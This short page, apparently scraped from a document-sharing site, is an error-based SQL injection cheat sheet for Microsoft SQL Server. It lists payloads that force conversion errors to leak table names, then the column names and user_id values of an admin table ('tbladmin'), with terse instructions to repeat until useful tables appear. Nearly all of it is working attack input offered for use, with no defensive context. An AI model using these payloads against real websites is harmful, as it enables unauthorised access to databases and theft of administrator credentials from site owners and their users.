You are on page 1of 1

and 1=convert(int,(select top 1 table_name from information_schema.

tables))-- l
ook for the table name in error
and 1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in ('error table_name')))-- look for another error name
and 1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in ('error table_name','another name')))--

continue this untill u get the useful table name


and 1=convert(int,(select top 1 column_name from information_schema.columns wher
e table_name='tbladmin'))-- check the column name in error
and 1=convert(int,(select top 1 column_name from information_schema.columns wher
e table_name='tbladmin' and column_name not in('1st column_name') ))--
and 1=convert(int,(select top 1 user_id from tbladmin))--

You might also like